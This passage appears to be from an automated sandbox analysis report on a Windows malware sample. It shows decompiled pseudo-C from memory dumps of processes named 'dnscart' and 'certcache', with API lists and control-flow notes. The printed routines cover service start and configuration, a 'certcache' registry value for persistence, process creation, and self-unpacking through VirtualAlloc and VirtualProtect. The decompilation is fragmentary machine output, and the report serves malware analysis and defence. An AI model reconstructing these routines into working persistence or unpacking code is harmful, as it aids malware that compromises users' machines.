    					HeapFree(GetProcessHeap(), 0, _t11);
    				}
    				if(_t15 != 0) {
    					StartServiceW(); // executed
    					CloseServiceHandle(_t15);
    				}
    				CloseServiceHandle(_t13);
    				return 1;
    			}

    APIs
    • GetProcessHeap.KERNEL32 ref: 0022992A
    • HeapFree.KERNEL32(00000000), ref: 00229931
    • ChangeServiceConfig2W.ADVAPI32(?,00000001), ref: 00229941
    • GetProcessHeap.KERNEL32(00000000,?,?,00000001), ref: 0022994A
    • HeapFree.KERNEL32(00000000), ref: 00229951
    • CloseServiceHandle.ADVAPI32 ref: 0022996E
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 56%
    			E00229A53(signed int __ebx, void* __eflags) {
    				int _t14;
    				signed int _t19;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    
    				_t19 = __ebx;
    				asm("scasb");
    				asm("int3");
    				L00221830(_t21, _t22);
    				if(RegCreateKeyExW(0x80000001,  *(_t23 - 4), 0, 0, 0, 2, 0, _t23 - 0xc, 0) == 0) {
    					RegSetValueExW( *(_t23 - 0xc), "certcache", 0, 1, _t23 - 0x214, 2 + _t19 * 2);
    					RegCloseKey( *(_t23 - 0xc));
    				}
    				HeapFree(GetProcessHeap(), ??, ??);
    				_t14 = HeapFree(GetProcessHeap(), ??, ??);
    				goto 0x231c47;
    				return _t14;
    			}

    APIs
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00229A75
    • RegSetValueExW.ADVAPI32(00000000,certcache,00000000,00000001,?,00000000), ref: 00229A9A
    • RegCloseKey.ADVAPI32(?), ref: 00229AA3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 35%
    			E00228A5E(void* __ecx, void* __edx, void* __edi, signed char __esi, void* __eflags) {
    				void* _t19;
    				intOrPtr _t20;
    				signed char _t25;
    				void* _t27;
    				intOrPtr _t31;
    				void* _t32;
    				void _t34;
    				signed char _t35;
    				signed char _t38;
    				signed int _t43;
    				intOrPtr _t46;
    				signed char _t47;
    				void* _t48;
    
    				L0:
    				while(1) {
    					L0:
    					_t47 = __esi;
    					_t45 = __edi;
    					_t20 = L00221F70(_t19, __ecx, __edx);
    					 *((intOrPtr*)(__edi + 8)) = _t20;
    					if(_t20 == 0) {
    						goto L17;
    					}
    					L11:
    					_t31 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
    					 *((intOrPtr*)(__edi + 0xc)) = _t31;
    					if(_t31 == 0) {
    						L15:
    						goto 0x2317a5;
    						asm("int3");
    						asm("int3");
    						_push( *((intOrPtr*)(_t45 + 8)));
    						L16:
    						asm("adc eax, 0x22c178");
    						goto L17;
    					} else {
    						L12:
    						goto 0x231789;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						L13:
    						asm("scasb");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						_t32 = CreateThread(??, ??, ??, ??, ??, ??);
    						 *(__edi + 0x10) = _t32;
    						if(_t32 == 0) {
    							goto L15;
    						} else {
    							L14:
    							 *((intOrPtr*)(__edi + 4)) =  *((intOrPtr*)(_t48 - 0x18));
    							_t34 =  *0x22c274; // 0x0
    							 *__edi = _t34;
    							 *0x22c274 = __edi;
    							do {
    								L1:
    								_t46 =  *((intOrPtr*)(_t48 - 4));
    								L2:
    								_t43 = 0;
    								_t38 = 0;
    								 *(_t48 - 8) = 0;
    								_t35 = 0x80;
    								if(_t47 < _t46) {
    									while(1) {
    										L3:
    										_t35 =  *_t47;
    										_t47 = _t47 + 1;
    										_t43 = _t43 | (_t35 & 0x7f) << _t38;
    										if(_t35 >= 0) {
    											break;
    										}
    										L4:
    										_t38 = _t38 + 7;
    										if(_t47 < _t46) {
    											continue;
    										}
    										break;
    									}
    									L5:
    									 *(_t48 - 8) = _t43;
    								}
    								L6:
    								_t25 =  !((_t35 & 0x000000ff) >> 7);
    								if((_t25 & 0x00000001) != 0) {
    									L7:
    									_t25 = _t43 + _t47;
    									if(_t25 <= _t46) {
    										L8:
    										 *(_t48 - 0xc) = _t47;
    										_t47 = _t25;
    										_t25 = L00228800(_t48 - 0xc, _t48 - 0x18);
    										if(_t25 != 0) {
    											goto L9;
    										}
    									}
    								}
    								L18:
    								goto 0x2317ba;
    								asm("int3");
    								return _t25;
    								L9:
    								_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
    								_t45 = _t27;
    							} while (_t27 == 0);
    							goto 0x231775;
    							asm("int3");
    							continue;
    						}
    					}
    					L19:
    					L17:
    					HeapFree(GetProcessHeap(), 0, _t45);
    					goto L1;
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 00228A45
    • RtlAllocateHeap.NTDLL(00000000), ref: 00228A4C
    • GetProcessHeap.KERNEL32(00000000), ref: 00228ABE
    • HeapFree.KERNEL32(00000000), ref: 00228AC5
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 43%
    			E00228AB4(void* __ebx, void* __edi, signed char __esi) {
    				signed char _t21;
    				intOrPtr _t27;
    				intOrPtr _t30;
    				void* _t31;
    				void _t33;
    				signed char _t36;
    				signed char _t37;
    				signed int _t41;
    				intOrPtr _t44;
    				void* _t45;
    				signed char _t46;
    				void* _t47;
    
    				L0:
    				while(1) {
    					L0:
    					_t46 = __esi;
    					asm("adc eax, 0x22c178");
    					while(1) {
    						L17:
    						HeapFree(GetProcessHeap(), 0, _t45);
    						while(1) {
    							L1:
    							_t44 =  *((intOrPtr*)(_t47 - 4));
    							L2:
    							_t41 = 0;
    							_t37 = 0;
    							 *(_t47 - 8) = 0;
    							_t36 = 0x80;
    							if(_t46 < _t44) {
    								while(1) {
    									L3:
    									_t36 =  *_t46;
    									_t46 = _t46 + 1;
    									_t41 = _t41 | (_t36 & 0x7f) << _t37;
    									if(_t36 >= 0) {
    										break;
    									}
    									L4:
    									_t37 = _t37 + 7;
    									if(_t46 < _t44) {
    										continue;
    									}
    									break;
    								}
    								L5:
    								 *(_t47 - 8) = _t41;
    							}
    							L6:
    							_t21 =  !((_t36 & 0x000000ff) >> 7);
    							if((_t21 & 0x00000001) != 0) {
    								L7:
    								_t21 = _t41 + _t46;
    								if(_t21 <= _t44) {
    									L8:
    									 *(_t47 - 0xc) = _t46;
    									_t42 = _t47 - 0x18;
    									_t38 = _t47 - 0xc;
    									_t46 = _t21;
    									_t21 = L00228800(_t47 - 0xc, _t47 - 0x18);
    									if(_t21 != 0) {
    										L9:
    										_t45 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
    										if(_t45 == 0) {
    											L1:
    											_t44 =  *((intOrPtr*)(_t47 - 4));
    											goto L2;
    										} else {
    											L10:
    											goto 0x231775;
    											asm("int3");
    											L11:
    											_t27 = L00221F70(_t23, _t38, _t42);
    											 *((intOrPtr*)(_t45 + 8)) = _t27;
    											if(_t27 == 0) {
    												L17:
    												HeapFree(GetProcessHeap(), 0, _t45);
    												continue;
    											} else {
    												L12:
    												_t30 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
    												 *((intOrPtr*)(_t45 + 0xc)) = _t30;
    												if(_t30 == 0) {
    													L16:
    													goto 0x2317a5;
    													asm("int3");
    													asm("int3");
    													_push( *((intOrPtr*)(_t45 + 8)));
    													goto L0;
    												} else {
    													L13:
    													goto 0x231789;
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													L14:
    													asm("scasb");
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													_t31 = CreateThread(??, ??, ??, ??, ??, ??);
    													 *(_t45 + 0x10) = _t31;
    													if(_t31 == 0) {
    														goto L16;
    													} else {
    														L15:
    														 *((intOrPtr*)(_t45 + 4)) =  *((intOrPtr*)(_t47 - 0x18));
    														_t33 =  *0x22c274; // 0x0
    														 *_t45 = _t33;
    														 *0x22c274 = _t45;
    														do {
    															goto L1;
    														} while (_t45 == 0);
    														goto L10;
    													}
    												}
    											}
    										}
    										L19:
    									}
    								}
    							}
    							L18:
    							goto 0x2317ba;
    							asm("int3");
    							return _t21;
    						}
    					}
    				}
    			}
















    APIs
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 00228A45
    • RtlAllocateHeap.NTDLL(00000000), ref: 00228A4C
    • GetProcessHeap.KERNEL32(00000000), ref: 00228ABE
    • HeapFree.KERNEL32(00000000), ref: 00228AC5
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 76%
    			E0022850C(intOrPtr __ecx, void* __edx, long* __edi) {
    				void* _t4;
    				void* _t9;
    				void* _t17;
    				void* _t19;
    
    				_t9 = __edx;
    				 *((intOrPtr*)(_t19 - 4)) = __ecx;
    				_t4 = RtlAllocateHeap(GetProcessHeap(), 0,  *__edi);
    				_t17 = _t4;
    				if(_t17 == 0) {
    					L4:
    					goto 0x2315de;
    					asm("int3");
    					return _t4;
    				} else {
    					_push(_t9);
    					_push( *((intOrPtr*)(_t19 - 4)));
    					if(L00222DB0(_t17, __edi) == 0) {
    						_t4 = _t17;
    						goto L4;
    					} else {
    						HeapFree(GetProcessHeap(), 0, _t17);
    						return 0;
    					}
    				}
    			}








    APIs
    • GetProcessHeap.KERNEL32(00000000), ref: 00228515
    • RtlAllocateHeap.NTDLL(00000000), ref: 0022851C
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0022853F
    • HeapFree.KERNEL32(00000000), ref: 00228546
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 100%
    			E0022A7A0(long __ecx) {
    				int _t3;
    				long _t7;
    				void* _t9;
    				void* _t10;
    
    				_t10 =  *0x22cbd4; // 0x0
    				_t7 = __ecx;
    				_t9 = 0x22cbd4;
    				while(_t10 != 0) {
    					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
    					if(_t3 == 0x102) {
    						_t9 = _t10;
    					} else {
    						 *_t9 =  *_t10;
    						CloseHandle( *(_t10 + 8));
    						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
    					}
    					_t10 =  *_t9;
    				}
    				return _t3;
    			}








    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0022A7B8
    • CloseHandle.KERNEL32(?), ref: 0022A7CC
    • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00228F95), ref: 0022A7D5
    • HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0022A7DC
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • _snprintf.NTDLL ref: 00229642
    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 0022964E
    • HeapFree.KERNEL32(00000000), ref: 00229655
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • OpenServiceW.ADVAPI32(?,?,00000001), ref: 0022989D
    • QueryServiceConfig2W.ADVAPI32 ref: 002298EC
    • GetProcessHeap.KERNEL32(00000000), ref: 002298FB
    • HeapFree.KERNEL32(00000000), ref: 00229902
    • CloseServiceHandle.ADVAPI32 ref: 00229909
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 73%
    			E0022891E(unsigned char* __eax, long __ebx, void* __edi, void* __esi) {
    				long _t10;
    				long _t12;
    				void* _t14;
    				void* _t17;
    
    				L0:
    				while(1) {
    					L0:
    					_t14 = __edi;
    					_t12 = __ebx;
    					 *__eax =  *__eax >> 1;
    					 *__eax =  *__eax;
    					VirtualFree( *(__esi + 8), 0, ??);
    					CloseHandle( *(__esi + 0x10));
    					 *__edi =  *__esi;
    					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
    					while(1) {
    						L4:
    						_t17 =  *_t14;
    						if(_t17 == 0) {
    							break;
    						}
    						L1:
    						_t10 = WaitForSingleObject( *(_t17 + 0x10), _t12);
    						if(_t10 == 0x102) {
    							L3:
    							_t14 = _t17;
    						} else {
    							L2:
    							goto 0x231734;
    							asm("int3");
    							asm("int3");
    							_push( *((intOrPtr*)(_t17 + 8)));
    							goto L0;
    						}
    					}
    					L5:
    					return _t10;
    					L6:
    				}
    			}








    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00228908
    • VirtualFree.KERNEL32(?,00000000), ref: 0022892B
    • CloseHandle.KERNEL32(?), ref: 00228934
    • GetProcessHeap.KERNEL32(00000000), ref: 00228941
    • HeapFree.KERNEL32(00000000), ref: 00228948
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 73%
    			E00228B2C(unsigned char* __eax, void* __ebx, void* __edi, void* __esi) {
    				long _t10;
    				void* _t13;
    				void* _t16;
    
    				L0:
    				while(1) {
    					L0:
    					_t13 = __edi;
    					 *__eax =  *__eax >> 1;
    					 *__eax =  *__eax;
    					VirtualFree( *(__esi + 8), 0, ??);
    					CloseHandle( *(__esi + 0x10));
    					 *__edi =  *__esi;
    					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
    					while(1) {
    						L4:
    						_t16 =  *_t13;
    						if(_t16 == 0) {
    							break;
    						}
    						L1:
    						_t10 = WaitForSingleObject( *(_t16 + 0x10), 0xffffffff);
    						if(_t10 == 0x102) {
    							L3:
    							_t13 = _t16;
    						} else {
    							L2:
    							goto 0x2317f6;
    							asm("int3");
    							asm("int3");
    							_push( *((intOrPtr*)(_t16 + 8)));
    							goto L0;
    						}
    					}
    					L5:
    					return _t10;
    					L6:
    				}
    			}







    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00228B16
    • VirtualFree.KERNEL32(?,00000000), ref: 00228B39
    • CloseHandle.KERNEL32(?), ref: 00228B42
    • GetProcessHeap.KERNEL32(00000000), ref: 00228B4F
    • HeapFree.KERNEL32(00000000), ref: 00228B56
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    Execution Graph

    Execution Coverage:4.8%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:0.4%
    Total number of Nodes:460
    Total number of Limit Nodes:1

    Graph


    Executed Functions

    Control-flow Graph

    C-Code - Quality: 45%
    			E001A16D3() {
    				void* __edi;
    				void* __esi;
    				int _t12;
    				void* _t13;
    
    				memset();
    				 *(_t13 - 0x58) = 0x44;
    				 *((intOrPtr*)(_t13 - 0x2c)) = 0x80;
    				_t12 = CreateProcessW(_t13 - 0x360, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x58, _t13 - 0x14); // executed
    				if(_t12 == 0) {
    					goto 0x1b0044;
    					asm("int3");
    					asm("int3");
    					return _t12;
    				} else {
    					WaitForSingleObject(__esi, 0xffffffff);
    					CloseHandle( *(__ebp - 0x14));
    					CloseHandle( *(__ebp - 0x10));
    					CloseHandle(__esi);
    					CloseHandle(__edi);
    					_pop(__edi);
    					_pop(__esi);
    					_pop(__ebp);
    					return 1;
    				}
    			}

    APIs
    • memset.NTDLL ref: 001A16D3
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001A1707
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001A1714
    • CloseHandle.KERNEL32(?), ref: 001A171D
    • CloseHandle.KERNEL32(?), ref: 001A1726
    • CloseHandle.KERNEL32 ref: 001A172D
    • CloseHandle.KERNEL32 ref: 001A1734
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E001A1670(signed int __eax, void* __ebx, void* __esi) {
    				signed int _t38;
    
    				_t38 = __eax %  *(__esi + __ebx - 0x17);
    			}

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

    Control-flow Graph

    control_flow_graph 54 19201b-192042 lstrcmp 56 192182-192196 54->56
    APIs
    • lstrcmp.KERNEL32(face,book), ref: 0019203A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.232736151.0000000000190000.00000040.sdmp, Offset: 00190000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_190000_certcache.jbxd

    Control-flow Graph

    control_flow_graph 57 1a9f9d-1a9fb0 memset GetProcessHeap HeapFree 58 1a9fbb-1a9fbd ExitProcess 57->58 59 1a9fb6 call 1a15b0 57->59 59->58
    C-Code - Quality: 58%
    			E001A9F9D() {
    				void* _t5;
    				void* _t6;
    				void* _t7;
    
    				memset();
    				HeapFree(GetProcessHeap(), 0, _t7); // executed
    				L001A15B0(_t5, _t6); // executed
    				ExitProcess(0);
    			}

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

    Control-flow Graph

    control_flow_graph 60 192663-1926e4 call 1923f0 call 19188a 65 1926ff-19270b 60->65 66 1926e6-1926fc 60->66 67 19270d-192744 65->67 68 192749-192756 65->68 66->65 69 192835-1928de VirtualProtect 67->69 70 19275c-19277f 68->70 69->68 72 1928e4 69->72 70->70 71 192781-19280c VirtualProtect call 19104c 70->71 74 192811-192825 71->74 72->69 74->69
    C-Code - Quality: 52%
    			E00192663(intOrPtr _a4) {
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char _v40;
    				long _v44;
    				char _v76;
    				intOrPtr _v80;
    				DWORD* _v84;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				intOrPtr* _v96;
    				void* _v100;
    				intOrPtr _v104;
    				intOrPtr* _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr* _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				intOrPtr _v136;
    				intOrPtr _v140;
    				intOrPtr _v144;
    				int _v148;
    				intOrPtr _v152;
    				intOrPtr _v156;
    				intOrPtr _v160;
    				signed int _v164;
    				signed int _v168;
    				intOrPtr _v172;
    				int _v176;
    				intOrPtr _v180;
    				char _v184;
    				intOrPtr _t100;
    				intOrPtr _t107;
    				intOrPtr _t108;
    				int _t113;
    				int _t131;
    				void* _t135;
    				intOrPtr _t157;
    				intOrPtr _t159;
    				char* _t160;
    				intOrPtr _t161;
    				void* _t164;
    				intOrPtr _t183;
    				unsigned int _t186;
    				intOrPtr _t192;
    				void* _t206;
    				intOrPtr _t210;
    
    				_t100 = _a4;
    				_v44 = 0;
    				_t135 =  *((intOrPtr*)(_t100 + 0x3c));
    				_v184 = _t135;
    				_v180 = _t100;
    				_v80 = _t100;
    				_v84 =  &_v44;
    				_v88 =  *((intOrPtr*)(_t100 + 0x20));
    				_v92 =  *((intOrPtr*)(_t100 + 0x40));
    				_v96 = _t100 + 0x3c;
    				_v100 = _t135;
    				E001923F0(); // executed
    				E0019188A(_v100);
    				_t210 = _t206 - 8 + 8 - 4 + 4;
    				_t164 = _v100;
    				_t192 =  *((intOrPtr*)(_t164 + 0x3c));
    				_v104 = _t164 + _t192;
    				_v108 = _v100 + 0x3c;
    				_v112 = 0x18;
    				if(_t192 + 0xffffffc0 <= 0xfc0) {
    					_t161 = _v104;
    					_t134 =  ==  ? _t161 + 0x18 : 0x18;
    					_v112 =  ==  ? _t161 + 0x18 : 0x18;
    				}
    				_v116 = _v112;
    				if(_v92 == 0) {
    					L4:
    					_v140 =  *_v96;
    					_v144 = 0;
    					do {
    						_t107 = _v144;
    						 *((char*)(_v140 + _t107)) =  *((intOrPtr*)(_v100 + _t107));
    						_t108 = _t107 + 1;
    						_v144 = _t108;
    					} while (_t108 != 0x400);
    					_t110 =  ==  ? _v100 +  *_v108 : 0;
    					 *((intOrPtr*)(( ==  ? _v100 +  *_v108 : 0) + 0x34)) =  *_v96;
    					_t113 = VirtualProtect(_v100, 0x400, 2,  &_v44); // executed
    					_t183 = _v80;
    					_v40 =  *((intOrPtr*)(_t183 + 0x6c));
    					_v36 =  *((intOrPtr*)(_t183 + 0x70));
    					_v32 =  *((intOrPtr*)(_t183 + 0x74));
    					_v28 =  *((intOrPtr*)(_t183 + 0x68));
    					_v24 =  *((intOrPtr*)(_t183 + 0x64));
    					_v20 = _v100 +  *((intOrPtr*)(_t183 + 0x44));
    					 *((intOrPtr*)(_t210 - 0xc)) = _t183;
    					_v184 = 0;
    					_v180 = 0x78;
    					_v148 = _t113;
    					_v152 = 0;
    					_v156 = 0x78;
    					E0019104C();
    					_t210 =  *((intOrPtr*)( &_v40 + 0x10));
    					goto __eax;
    				} else {
    					_t160 =  &_v76;
    					_t203 =  ==  ? _v104 : 0;
    					_v120 = ( *(( ==  ? _v104 : 0) + 0x14) & 0x0000ffff) + _v116;
    					_v124 = _t160;
    					_v128 = _t160 + 0x10;
    					_v132 = _t160;
    					_v136 = 0;
    					while(1) {
    						_t157 = _v120;
    						_t186 =  *(_t157 + 0x24);
    						_v160 = _v136;
    						_v164 = _t186 >> 0x0000001e & 0x00000001;
    						_v168 = _t186 >> 0x1f;
    						 *_v124 = 1;
    						asm("movaps xmm0, [0x1940e0]");
    						asm("movups [eax], xmm0");
    						_v172 = _t157;
    						_t131 = VirtualProtect(_v100 +  *((intOrPtr*)(_t157 + 0xc)),  *(_t157 + 8),  *( &_v76 + (_v164 << 4) + (_v168 << 3) + ((_t186 >> 0x0000001d & 0x00000001) << 2)),  &_v44); // executed
    						_t159 = _v160 + 1;
    						_v176 = _t131;
    						_v120 = _v172 + 0x28;
    						_v136 = _t159;
    						if(_t159 == _v92) {
    							goto L4;
    						}
    					}
    					goto L4;
    				}
    			}

    APIs
      • Part of subcall function 001923F0: VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 00192428
    • VirtualProtect.KERNELBASE(?,00000400,00000002,00000000), ref: 001927B1
    • VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 001928B6
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.232736151.0000000000190000.00000040.sdmp, Offset: 00190000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_190000_certcache.jbxd

    Control-flow Graph

    C-Code - Quality: 47%
    			E001A9F42() {
    				void* _t6;
    				void* _t11;
    				void* _t12;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    
    				L001A1B10(E001A1BE0(_t11, _t12, _t18, _t19), 0x1a11f0, _t18, _t19);
    				_push(0x1ac0d0);
    				_push(0x64df2dad);
    				_push(0x48);
    				_t15 = E001A1BE0(_t11, 0x8f7ee672, _t18, _t19);
    				L001A1B10(_t3, 0x1a10d0, _t18, _t19);
    				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
    				_t20 = _t6;
    				if(_t20 == 0) {
    					L3:
    					ExitProcess(0);
    				}
    				goto 0x1b1d52;
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				memset();
    				HeapFree(GetProcessHeap(), 0, _t20); // executed
    				L001A15B0(_t11, _t15); // executed
    				goto L3;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000,08000000), ref: 001A9F82
    • RtlAllocateHeap.NTDLL(00000000), ref: 001A9F89
    • ExitProcess.KERNEL32 ref: 001A9FBD
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

    Control-flow Graph

    control_flow_graph 86 1923f0-1924bc VirtualAlloc 87 1924c9-19259f 86->87 88 1925a5-1925ce 87->88 88->88 89 1925d0-192658 call 1921ac 88->89 92 1924be-1924c8 89->92 93 19265e 89->93 93->87
    C-Code - Quality: 30%
    			E001923F0(intOrPtr _a4, void* _a8) {
    				char _v21;
    				char _v26;
    				char _v31;
    				intOrPtr* _v36;
    				intOrPtr _v40;
    				intOrPtr* _v44;
    				intOrPtr* _v48;
    				void** _v52;
    				char* _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr* _v72;
    				intOrPtr* _v76;
    				intOrPtr* _v80;
    				void** _v84;
    				char* _v88;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				char* _v100;
    				intOrPtr _v104;
    				signed int _v108;
    				signed int _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				intOrPtr _v136;
    				intOrPtr _v140;
    				intOrPtr _v144;
    				intOrPtr _v148;
    				intOrPtr _v152;
    				intOrPtr _v156;
    				intOrPtr _v160;
    				intOrPtr _v164;
    				void* _t121;
    				intOrPtr _t143;
    				intOrPtr _t148;
    				intOrPtr _t157;
    				intOrPtr _t158;
    				void* _t162;
    				intOrPtr _t164;
    				intOrPtr _t167;
    				char* _t168;
    				void** _t173;
    				void* _t178;
    				intOrPtr _t191;
    				intOrPtr _t197;
